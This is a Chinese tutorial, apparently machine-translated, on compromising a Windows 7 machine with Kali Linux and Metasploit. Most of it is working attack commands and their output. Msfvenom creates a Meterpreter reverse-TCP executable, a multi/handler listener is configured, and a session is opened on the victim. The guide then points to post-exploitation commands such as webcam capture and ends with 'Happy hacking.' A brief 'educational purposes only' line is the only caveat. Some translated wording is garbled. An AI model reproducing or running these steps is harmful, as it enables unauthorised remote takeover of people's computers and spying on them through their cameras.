快速入门指南:如何使用Kali Linux破解Windows
Kali Linux源自Debian Linux,主要用于渗透。 它预先安装了300多个渗透测试程序。 Metasploit项目中的Metasploit框架(开发和执行漏洞利用的工具)对此提供了支持。 让我们从使用Kali Linux入侵Windows开始。 值得注意的是,我们仅出于教育目的而写这篇文章。
[*]
[*]原始机器详细信息:
[*]卡利Linux
[email protected]:/# uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux [email protected]:/#
[*]
[*]用于黑客攻击的目标机器:
Windows 7 Ultimate SP1
[*]
[*]第1步 … 负载创建
[*]有效负载是一种类似于病毒或特洛伊木马的程序,出于黑客目的,该程序在远程计算机上运行。 要创建有效负载,请使用下面编写的命令,这些命令将通过 卡利Linux…
[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: /root/program.exe [email protected]:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
[*]
[*]我们使用ls命令来确认有效载荷程序已在指定位置成功创建。
[*]第2步: 运行mfsconsole命令,该命令将运行msf查询。
[email protected]:# msfconsole .,,. . .$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
[*]
[*]第三步: 为了使用,我们使用了以下部分:
- 端口4444:您可以选择使用
- LHOST IP:使用Kali Linux时的IP 192.168.189.128。 您可以使用Kali命令找出您的计算机正在使用的IP。
[email protected]:/# ip r l 192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100 [email protected]:/#
[*]
[*]现在在msf行“ use exploit / multi / handler”中给出以下命令
msf > use exploit/multi/handler msf exploit(handler) >
[*]
[*]然后在以下行中发出命令“设置有效负载窗口/ meterpreter / reverse_tcp”:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
[*]
[*]现在,使用lhost和lport命令设置本地IP和端口,如下所示:
msf exploit(handler) > set lhost 192.168.189.128 lhost => 192.168.189.128 msf exploit(handler) > set lport 4444 lport => 4444
[*]
[*]最后使用命令。
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler...
[*]
[*]现在,您需要在Windows计算机上执行命令“ program.exe”,一旦在目标计算机上执行了该命令,便可以设置一个抄表器会话。 只需键入SysInfo即可获取受感染Windows计算机的详细信息。
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.189.1 [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 meterpreter > sysinfo Computer : MANN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
[*]
[*]成功收到零件后,您可以使用命令“帮帮我“这将向您显示可以用来入侵系统的所有选项,例如,您可以执行网络摄像头捕捉命令“ webcam_snap”,就像您可以使用许多可用选项一样。 快乐黑客!!!